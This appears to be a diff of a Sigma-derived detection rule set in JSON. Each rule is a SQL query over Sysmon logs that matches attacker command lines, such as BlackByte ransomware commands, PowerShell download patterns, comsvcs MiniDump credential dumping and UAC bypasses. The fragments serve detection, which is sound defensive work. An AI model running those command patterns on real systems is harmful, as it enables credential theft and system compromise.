[ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", - "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1021.002", - "attack.t1218.011" - ], + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", + "status": "test", + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 
'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. 
before log collection agent installation" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", - "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' 
ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Lolbin Unregmp2.exe Use As Proxy", - "id": "727454c0-d851-48b0-8b89-385611ab0704", - "status": "experimental", - "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", - "author": "frack113", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. 
This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_unregmp2.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Renamed ProcDump Execution", - "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "title": "Suspicious RASdial Activity", + "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", "status": "test", - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious process related to rasdial.exe", + "author": "juju4", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR 
((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%rasdial.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_rasdial_execution.yml" }, { - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", - "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WMI Persistence - Script Event Consumer", + "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "status": "test", + "description": "Detects WMI script event consumers", + "author": "Thomas Patzke", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' 
AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" }, { - "title": "CL_LoadAssembly.ps1 Proxy Execution", - "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", - "status": "experimental", - "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", - "author": "frack113", + "title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": "test", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", - "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "title": "Suspicious Execution of InstallUtil Without Log", + "id": "d042284c-a296-4988-9be5-f424fadcc28c", "status": "test", - "description": "There is an option for a MS VS Just-In-Time Debugger 
\"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", - "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", + "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "author": "frack113", "tags": [ - "attack.t1218", "attack.defense_evasion" ], "falsepositives": [ - "The process spawned by vsjitdebugger.exe is uncommon." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND Image LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" + "filename": "proc_creation_win_instalutil_no_log_execution.yml" }, { - "title": "Active Directory Structure Export Via Csvde.EXE", - "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", + "title": "HackTool - SharpLDAPmonitor Execution", + "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", "status": "experimental", - "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects execution of the SharpLDAPmonitor. 
Which can monitor the creation, deletion and changes to LDAP objects.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_csvde_export.yml" + "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" }, { - "title": "DirLister Execution", - "id": "b4dc61f5-6cce-468e-a608-b48b469feaa2", + "title": "Greedy File Deletion Using Del", + "id": "204b17ae-4007-471b-917b-b917b315c5db", "status": "experimental", - "description": "Detect the usage of \"DirLister.exe\" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.", + "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. 
This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate use by users" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'DirLister.exe' OR Image LIKE '%\\\\dirlister.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\*.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dirlister_execution.yml" + "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "title": "PowerShell Download Pattern", + "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "status": "test", - "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a Powershell process that contains download commands in its command line string", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% 
/user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_powershell_download_patterns.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. 
Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" - ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" - }, - { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", - "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.execution", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE 
'%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", + "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", + "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.exfiltration", + "attack.t1567" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "DataSvcUtil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (Image 
LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' OR OriginalFileName = 'DataSvcUtil.exe'))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", + "title": "Suspicious DumpMinitool Execution", + "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE 
'%--dumpType%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "status": "test", - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1562.004" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. 
